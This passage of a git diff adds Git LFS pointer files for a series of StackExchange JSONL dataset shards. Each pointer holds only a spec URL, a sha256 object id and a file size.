https://git-lfs.github.com/spec/v1 +oid sha256:68eb75ba0678e4d1803e8c3ba1d55b2b1e5776f744c7c967d9405bf4b41011d9 +size 36303555 diff --git a/data/stackexchange/1-1/71_2289.jsonl b/data/stackexchange/1-1/71_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..317c51cb4aebbb5c00f251e46d3bfd3ce7395c8e --- /dev/null +++ b/data/stackexchange/1-1/71_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:97ea4fe56422b42843fc7bcc2b8586c758b5b8b23b5e20b1dce58eaa524d1175 +size 39294819 diff --git a/data/stackexchange/1-1/720_2289.jsonl b/data/stackexchange/1-1/720_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..68b735925404c6b6c4374643cbb13d099a01a63c --- /dev/null +++ b/data/stackexchange/1-1/720_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7a4f20241abcc8f66b03ad8f1e9e1053dc9be018d555cc629f59a01d9a6660af +size 36126227 diff --git a/data/stackexchange/1-1/721_2289.jsonl b/data/stackexchange/1-1/721_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0fd13ad5139ab4c572453db7b445c72bc226edff --- /dev/null +++ b/data/stackexchange/1-1/721_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2733e994c0c750ffd80a20e8b5f4ff177f1568d4de7729380a32ef921d5ab669 +size 36295798 diff --git a/data/stackexchange/1-1/722_2289.jsonl b/data/stackexchange/1-1/722_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fe45e9600c49e0480596381640531c074a3e97d4 --- /dev/null +++ b/data/stackexchange/1-1/722_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b4d65e7095fd7b6fa0c3ca31e567431c1a61ea558d4f29091e2a2b4acfafa70 +size 36856746 diff --git a/data/stackexchange/1-1/723_2289.jsonl b/data/stackexchange/1-1/723_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c9f7606a4240188db891b00f82d197c234cbd3e1 --- /dev/null +++ b/data/stackexchange/1-1/723_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ce2e353263a8266f672b52ff0405b293cbfb204eb2ab306c071049572b41b2e5 +size 36594203 diff --git a/data/stackexchange/1-1/724_2289.jsonl b/data/stackexchange/1-1/724_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..28167b71ae805b29bc65c3d9087e7805c511c75f --- /dev/null +++ b/data/stackexchange/1-1/724_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:607f3f9c5a23cfe1cfc0ff2d320ed7f63d304d9b1fc8147d647c36d5f3f8aa77 +size 36746338 diff --git a/data/stackexchange/1-1/725_2289.jsonl b/data/stackexchange/1-1/725_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7a78b9f9b249d97485e71d7b6a5e8234e735ccb8 --- /dev/null +++ b/data/stackexchange/1-1/725_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:45eaec6ca50faad7207002f48506ee54b6bbf82c8ff9e456226b532540074f04 +size 37122353 diff --git a/data/stackexchange/1-1/726_2289.jsonl b/data/stackexchange/1-1/726_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6965777f31b9610b7846c2cdbb9124c5995d9ab5 --- /dev/null +++ b/data/stackexchange/1-1/726_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cb1db3b8b694263b8c7cf547f3f7b279ea2ed06c76fd977e8f227b9a45024dcc +size 36363978 diff --git a/data/stackexchange/1-1/727_2289.jsonl b/data/stackexchange/1-1/727_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0066dde1e705687346577592b016599ea6680fab --- /dev/null +++ b/data/stackexchange/1-1/727_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e49bab8155ca056a892cd41c91e249233a64f5c249abccfe25de1b900f7da776 +size 35723811 diff --git a/data/stackexchange/1-1/728_2289.jsonl b/data/stackexchange/1-1/728_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d64357b6ce00730cdb5036fcf6fe284b00dfe55e --- /dev/null +++ b/data/stackexchange/1-1/728_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cdec25cd5f357101d79ffd238533b7e25036efdbe4a56e12bf887d48cdf958e7 +size 36013248 diff --git a/data/stackexchange/1-1/729_2289.jsonl b/data/stackexchange/1-1/729_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fe0027bcbf1a004fb9663cff828539547a8e3a28 --- /dev/null +++ b/data/stackexchange/1-1/729_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5649f5fd37924c1f455406844d9b1602409b88338fdd913d70059d9fd4e5cb96 +size 36584394 diff --git a/data/stackexchange/1-1/72_2289.jsonl b/data/stackexchange/1-1/72_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..261998f5a3af31b6c2ccec3e7813eff81166a55a --- /dev/null +++ b/data/stackexchange/1-1/72_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3ab9d0aa900a43cda44bb5ae69a3513b74529be1a35b16f3a05e59147b1b8781 +size 40546531 diff --git a/data/stackexchange/1-1/730_2289.jsonl b/data/stackexchange/1-1/730_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c230ebf87e7c24574fc8e4a0cf1ace612bffb78f --- /dev/null +++ b/data/stackexchange/1-1/730_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9405bb818150b94e372edf0e0e1126619365c36b6d657e399e0586134f1398be +size 36382149 diff --git a/data/stackexchange/1-1/731_2289.jsonl b/data/stackexchange/1-1/731_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e33fa0c84ef4556a2998812b9b25cbae4f0c69b0 --- /dev/null +++ b/data/stackexchange/1-1/731_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5955a7f19583b83a0b9fb99df23f5b64b907b49af18275e5dddfa90e76c3cc6f +size 36417903 diff --git a/data/stackexchange/1-1/732_2289.jsonl b/data/stackexchange/1-1/732_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7c7d6e10a6d924a96f5cd98b67daced3b130a16f --- /dev/null +++ b/data/stackexchange/1-1/732_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9a9e05a5ad8a12ed645bd6d7217a05316ac5a31c34e54a057e3c70b8139bfdc8 +size 36437642 diff --git a/data/stackexchange/1-1/733_2289.jsonl b/data/stackexchange/1-1/733_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..932a22bfcc3d591a1dceec92d41ff96f1ee36576 --- /dev/null +++ b/data/stackexchange/1-1/733_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5a846d500cddc424c380a13807b764aba17c3bc73dba00df310278677650bd5e +size 36634800 diff --git a/data/stackexchange/1-1/734_2289.jsonl b/data/stackexchange/1-1/734_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..64d0adb44bb2ef068ef9b801a2a9c50be1b72f3b --- /dev/null +++ b/data/stackexchange/1-1/734_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fdcfd3a831102e936a01eecee41183e5a89ce81b34ed8ca50484f50fc25cd774 +size 36506186 diff --git a/data/stackexchange/1-1/735_2289.jsonl b/data/stackexchange/1-1/735_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b04fc688e025d8ca29ad71e994b801aff9168e3d --- /dev/null +++ b/data/stackexchange/1-1/735_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b4ac683b6ba26d10d118e39e8326ea641fdb13a31e8673968e9682bcdb4eea5a +size 36339580 diff --git a/data/stackexchange/1-1/736_2289.jsonl b/data/stackexchange/1-1/736_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0ae84420d66b27d423e78739518e98600806b6da --- /dev/null +++ b/data/stackexchange/1-1/736_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:72f967fc8d8d13d2dbbd7e885206a3b4087768555755a3cc779c4f207ab9fefa +size 36802507 diff --git a/data/stackexchange/1-1/737_2289.jsonl b/data/stackexchange/1-1/737_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..48eac24c78c9cfc459d3c6dd0af5594ed7888871 --- /dev/null +++ b/data/stackexchange/1-1/737_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b609c8cc7bd995f2b0a9c6660a1d2f316f6ab52b14aa704033c6d52167525692 +size 36282621 diff --git a/data/stackexchange/1-1/738_2289.jsonl b/data/stackexchange/1-1/738_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eda9f03ae220895e86441c5c4405666b9d42e6b4 --- /dev/null +++ b/data/stackexchange/1-1/738_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d1e7549f21a164c3ebe823c6fc0d18670321e4f6b2f1725281dd604f79c57f8c +size 37024173 diff --git a/data/stackexchange/1-1/739_2289.jsonl b/data/stackexchange/1-1/739_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..01099e7b7a80e439487b199185f0c2941146e22c --- /dev/null +++ b/data/stackexchange/1-1/739_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d41a0b1941d2ee4690fa600cd9936a686a1f8f7c23decb57ddaac46652407e42 +size 36606563 diff --git a/data/stackexchange/1-1/73_2289.jsonl b/data/stackexchange/1-1/73_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..41836d5a50a2bb1c6afc2eec0cecb6fd5b6b432b --- /dev/null +++ b/data/stackexchange/1-1/73_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9418239eec600be8ed83c70930f7f951f013d97e4d53166a91261c7555e3b012 +size 39938043 diff --git a/data/stackexchange/1-1/740_2289.jsonl b/data/stackexchange/1-1/740_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2351d250d06e6ed7a3a9b69817add0aa4b007da7 --- /dev/null +++ b/data/stackexchange/1-1/740_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a5222119a1d33ef867bcc380e8d739f139b01f3d3f6699cc86f8a048f837259e +size 36981923 diff --git a/data/stackexchange/1-1/741_2289.jsonl b/data/stackexchange/1-1/741_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9a31646b98302e85bc6d454106bc1c6b863fe3a5 --- /dev/null +++ b/data/stackexchange/1-1/741_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6686ff69a1f66c58d5d9b34871738d75c056a3e84795d3d77798e203639e47dc +size 36882445 diff --git a/data/stackexchange/1-1/742_2289.jsonl b/data/stackexchange/1-1/742_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..91f2558ee85140d56675c9d9d8dad333dade37f9 --- /dev/null +++ b/data/stackexchange/1-1/742_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c699fa8a3749cda6f8de7dbd03f8b9141891c11bb031995322486978a5e3d7df +size 36971291 diff --git a/data/stackexchange/1-1/743_2289.jsonl b/data/stackexchange/1-1/743_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..87579ad12cec0a8257ff52fecb2796450cac7f5f --- /dev/null +++ b/data/stackexchange/1-1/743_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1205269d7711657adc9a7f215a26556eae2cdef3d01642b3fb60a9527f4a2058 +size 36527367 diff --git a/data/stackexchange/1-1/744_2289.jsonl b/data/stackexchange/1-1/744_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cf0ad1664337bcbf42ed94aeb935f0ad20cc170e --- /dev/null +++ b/data/stackexchange/1-1/744_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4337d925429fed843ec229f07db081327fdd63ad4c238cffbae41330e44c5da9 +size 36171689 diff --git a/data/stackexchange/1-1/745_2289.jsonl b/data/stackexchange/1-1/745_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..29fe23e4eff28ba6a6967a26eaf87b9775644751 --- /dev/null +++ b/data/stackexchange/1-1/745_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c26716350687b31dbd70bf5662106afe336534f0a89e8fff719e6590fd45d7dd +size 36815364 diff --git a/data/stackexchange/1-1/746_2289.jsonl b/data/stackexchange/1-1/746_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..23e9dd4734912721acf72423bf2412fd4fb2daae --- /dev/null +++ b/data/stackexchange/1-1/746_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:af5a75369f35065cca479d841778598047d9b9d796e696a584e54c5e9fef2d1d +size 36932261 diff --git a/data/stackexchange/1-1/747_2289.jsonl b/data/stackexchange/1-1/747_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9c420634ff505eb9170976267b26799deb9f1b71 --- /dev/null +++ b/data/stackexchange/1-1/747_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9e3283d6eddcaae7cd2d86bf4c93d4709a181e06fb21b9f94e90d8d41a67ca7c +size 36693890 diff --git a/data/stackexchange/1-1/748_2289.jsonl b/data/stackexchange/1-1/748_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ca647110102095c020b99f99300f9c1e46b84aa7 --- /dev/null +++ b/data/stackexchange/1-1/748_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f71b5af0ad8da8a7180e3a495e823fbcad711fcf04842d2b3725ad2771f01ba +size 36147884 diff --git a/data/stackexchange/1-1/749_2289.jsonl b/data/stackexchange/1-1/749_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..baf364785f78b0f765bc12f546967cba5d8f9851 --- /dev/null +++ b/data/stackexchange/1-1/749_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3b965b7068759b79152aa6a247d9582e3bf8a195736d150690dc2635bbac7aba +size 36400897 diff --git a/data/stackexchange/1-1/74_2289.jsonl b/data/stackexchange/1-1/74_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..106e51a3b9403717b6c5893a63b5e8955dcdac0c --- /dev/null +++ b/data/stackexchange/1-1/74_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d6b346dccbc8e22bbc6d6122062786227d7719e87cb8cb915d9218439ce666d9 +size 39348373 diff --git a/data/stackexchange/1-1/750_2289.jsonl b/data/stackexchange/1-1/750_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..346151e9b508b693df0f7173a160f2a9ddff9336 --- /dev/null +++ b/data/stackexchange/1-1/750_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2ef371911ef35ddfebfb8d1b2f267e961cd91f473f03e251ec5ecde9fca91776 +size 36456161 diff --git a/data/stackexchange/1-1/751_2289.jsonl b/data/stackexchange/1-1/751_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..366d9238a96fdb4881f59f0bbf4830098dd394d2 --- /dev/null +++ b/data/stackexchange/1-1/751_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:996f07551e326f082084ff0551fe949d7549b2abd27a2277734211dd0968310f +size 36123227 diff --git a/data/stackexchange/1-1/752_2289.jsonl b/data/stackexchange/1-1/752_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..68e665644ed523413600b241635f3e361d4ee910 --- /dev/null +++ b/data/stackexchange/1-1/752_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1fdafb71be60e3e62226ebe94189f3edc040ebae7e32942db9e422dd7b350bd7 +size 36210794 diff --git a/data/stackexchange/1-1/753_2289.jsonl b/data/stackexchange/1-1/753_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9542b0c380ec5ce5fa0c08c7002ced5711690231 --- /dev/null +++ b/data/stackexchange/1-1/753_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7eb943ba28b8dcff0b123b6ac9d63325c6ff1295fdf23f897cd65deec06867b5 +size 36367656 diff --git a/data/stackexchange/1-1/754_2289.jsonl b/data/stackexchange/1-1/754_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3b8c34444ae751516ccc5f503307e2ac5e6c90df --- /dev/null +++ b/data/stackexchange/1-1/754_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e2c26c43f8ec9716ada17b69bfeb086ab825f707c35483d0200b71b3a25795bc +size 36446176 diff --git a/data/stackexchange/1-1/755_2289.jsonl b/data/stackexchange/1-1/755_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d19dc0ff199bba159ab1b930aa7946057e7c7aeb --- /dev/null +++ b/data/stackexchange/1-1/755_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3e625f0ae9de33f17450b02f1689b5ff61ef94f678ece6722b81efa27ebd2eb8 +size 35755169 diff --git a/data/stackexchange/1-1/756_2289.jsonl b/data/stackexchange/1-1/756_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b3a50613008afddd49803a5548144b6971fe48b2 --- /dev/null +++ b/data/stackexchange/1-1/756_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b47b1c2accdcdc942f4bd101988b40cacf4bf49d6548535ef74ab0f7fc0b4c51 +size 35926219 diff --git a/data/stackexchange/1-1/757_2289.jsonl b/data/stackexchange/1-1/757_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..39de4690478f99b2981845d093c4581075c47257 --- /dev/null +++ b/data/stackexchange/1-1/757_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8429c064807210bf4c645270571cedb5b5f653891fb7e3e77941c50d7c9c30ed +size 35514977 diff --git a/data/stackexchange/1-1/758_2289.jsonl b/data/stackexchange/1-1/758_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5d3d42aea7f89880234f37da0ac4e1ec671e7ab7 --- /dev/null +++ b/data/stackexchange/1-1/758_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b6dc541366b476eb54e25f5066365bb994ddcdfb0c9eb2ca705d926c0948f923 +size 35842374 diff --git a/data/stackexchange/1-1/759_2289.jsonl b/data/stackexchange/1-1/759_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b7d2eadf59892d5ec32c306172cd66831f892e24 --- /dev/null +++ b/data/stackexchange/1-1/759_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:86c7ea1fc42deb826b737d2fc294a5510e8c2582e1a62cd223daab10fdaafa38 +size 35932653 diff --git a/data/stackexchange/1-1/75_2289.jsonl b/data/stackexchange/1-1/75_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..736ad71c7d940ec3703426efb08abe83327fa7ef --- /dev/null +++ b/data/stackexchange/1-1/75_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0f91e8789cc49ddb4b9847be400457bf982c9f58e0b7e2f7117a19181bf90b1a +size 38948739 diff --git a/data/stackexchange/1-1/760_2289.jsonl b/data/stackexchange/1-1/760_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..40000c5bf659ae6045c64a85b459cc6912f64fb3 --- /dev/null +++ b/data/stackexchange/1-1/760_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1f8bccb6b6f0b10b04cc27d85cc0590b83858321a91be29f5264b7400f5fa357 +size 36111929 diff --git a/data/stackexchange/1-1/761_2289.jsonl b/data/stackexchange/1-1/761_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..556d9f12b409d9a2d986ff46907090d3702720d6 --- /dev/null +++ b/data/stackexchange/1-1/761_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c5c256cc1449798e9cf883963285f1f2c24923e18c905c6641c4083a16637413 +size 36311281 diff --git a/data/stackexchange/1-1/762_2289.jsonl b/data/stackexchange/1-1/762_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4141925e4ab71dd6bd230a6cec6f1bcc59b28e5a --- /dev/null +++ b/data/stackexchange/1-1/762_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fad4608ad5c1ad566872e078d4dbe7cf7959b51281cdb39b3b4c6b0d14704441 +size 36219843 diff --git a/data/stackexchange/1-1/763_2289.jsonl b/data/stackexchange/1-1/763_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b30e22c9156c41ce81ea71ec9ac04781b4423343 --- /dev/null +++ b/data/stackexchange/1-1/763_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d1fb8930d6346dc6b5005d0b3bb32b3beb5ee7b332a6fce81f32409c9ab79c03 +size 35714846 diff --git a/data/stackexchange/1-1/764_2289.jsonl b/data/stackexchange/1-1/764_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cb07f358f64e7be46966d3fd8e936265c2280692 --- /dev/null +++ b/data/stackexchange/1-1/764_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9e537bb657158be68aff44d2f7326e8068712232b3a3fb7f40a6c33c73b88d2 +size 36217965 diff --git a/data/stackexchange/1-1/765_2289.jsonl b/data/stackexchange/1-1/765_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..baca4427f6a0bf0a832f1ba7b84a1e3d4812b91f --- /dev/null +++ b/data/stackexchange/1-1/765_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:76c997f377ffd861568fe16a9d6dc72740b959e077d14d4dddee28d73c3f4695 +size 35786475 diff --git a/data/stackexchange/1-1/766_2289.jsonl b/data/stackexchange/1-1/766_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f75db864d6c5615836962737074679fa8db055d9 --- /dev/null +++ b/data/stackexchange/1-1/766_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4304aaceff557a377d6d5edf3ee650d19084a365b74626695aa8e3ae166e1e93 +size 36226084 diff --git a/data/stackexchange/1-1/767_2289.jsonl b/data/stackexchange/1-1/767_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c944ad3cc5f404ff114d32774ae6ec7786804197 --- /dev/null +++ b/data/stackexchange/1-1/767_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0416ed4eefcbe85a8399e97eb7951d6903ce0e6358fa86f9999664ed77c84abf +size 35933173 diff --git a/data/stackexchange/1-1/768_2289.jsonl b/data/stackexchange/1-1/768_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..51891ff3beacc3d63c687144194ddac67641ee5a --- /dev/null +++ b/data/stackexchange/1-1/768_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:46982d3cfb4029b559b8b56aab0cb7eae65eb545fd545c929e8a8ca4551f6551 +size 36406524 diff --git a/data/stackexchange/1-1/769_2289.jsonl b/data/stackexchange/1-1/769_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..46de77eb2ef0b96c87de7bdd59e3df70309f205f --- /dev/null +++ b/data/stackexchange/1-1/769_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a532b0d9361309cef4ae771b1b7139c745cb14ce7cb3b1c7b3be6fb479479080 +size 36560848 diff --git a/data/stackexchange/1-1/76_2289.jsonl b/data/stackexchange/1-1/76_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bf35be9d22d8e40df586841bc5b311e76237fa4d --- /dev/null +++ b/data/stackexchange/1-1/76_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8ae9421239f14d457e5ec38fe2db8bf17af5d91de5f37e2ef30eaea289b3d7fd +size 39486923 diff --git a/data/stackexchange/1-1/770_2289.jsonl b/data/stackexchange/1-1/770_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aacc928c69b8d8758bb57fe358ac65e528e11d43 --- /dev/null +++ b/data/stackexchange/1-1/770_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ff51defbded98f8ab53129c34d72fcdf9e279884e8b5c77f941483943902fbe8 +size 36215344 diff --git a/data/stackexchange/1-1/771_2289.jsonl b/data/stackexchange/1-1/771_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a16aeae35a6fa24f2aa54435fe8dbac84aeae3ac --- /dev/null +++ b/data/stackexchange/1-1/771_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a881fa34a583d72e813aed3563216633c4ec2ed1f0ec5631580aabb89e80e1fd +size 36181404 diff --git a/data/stackexchange/1-1/772_2289.jsonl b/data/stackexchange/1-1/772_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..322df873fcb98393c9802b70f69c448c817ccfee --- /dev/null +++ b/data/stackexchange/1-1/772_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fcc413e8d06ebc5178c318fb961069f44a7920e2924eb8ff9214feb99efef14d +size 36294222 diff --git a/data/stackexchange/1-1/773_2289.jsonl b/data/stackexchange/1-1/773_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..74421c76af17d41b34f3893133932610575694bc --- /dev/null +++ b/data/stackexchange/1-1/773_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:be56a8cb78130c13f6917fcf14d5321d7864bff8aecd2ede45ba1401ab2c6bef +size 36291432 diff --git a/data/stackexchange/1-1/774_2289.jsonl b/data/stackexchange/1-1/774_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e1747df2b9546443def5621ca3be2102a27d0f0e --- /dev/null +++ b/data/stackexchange/1-1/774_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:479d8350fc9e06fd5a3207012229dfaca4dc5efd820f9024ecdb93ee9e84f86e +size 35571053 diff --git a/data/stackexchange/1-1/775_2289.jsonl b/data/stackexchange/1-1/775_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7b03e7c1a460285b9e49c7cd491bc7e3551c386e --- /dev/null +++ b/data/stackexchange/1-1/775_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eeb7a544ae6da45711f4e5bdc207649d330518b42fcfbf1d517bdf1580ecb699 +size 36634225 diff --git a/data/stackexchange/1-1/776_2289.jsonl b/data/stackexchange/1-1/776_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0376a91cd7c5cee9f211dae15f63a559d3f4a69c --- /dev/null +++ b/data/stackexchange/1-1/776_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:85c20f585e391a1d87ae4c58226b8f608a9f53acf14c4a2a3299b78217733e63 +size 36337843 diff --git a/data/stackexchange/1-1/777_2289.jsonl b/data/stackexchange/1-1/777_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0ef66ff71c3907c7dd9978298107eaef496619fb --- /dev/null +++ b/data/stackexchange/1-1/777_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:874380c9da9122471df36c6108a057b41984603e659406c919b7b1007ef6de3a +size 36230541 diff --git a/data/stackexchange/1-1/778_2289.jsonl b/data/stackexchange/1-1/778_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7b9aca00b0ba12e5733d77e5a14f7362edf28ead --- /dev/null +++ b/data/stackexchange/1-1/778_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:91e61ebdf8df549ad5a8e4b16907a8a8c35c8226bc17a91b766b412822810f64 +size 36518771 diff --git a/data/stackexchange/1-1/779_2289.jsonl b/data/stackexchange/1-1/779_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bb162c3a7859a1624b648c05ecd0be75408c2aee --- /dev/null +++ b/data/stackexchange/1-1/779_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 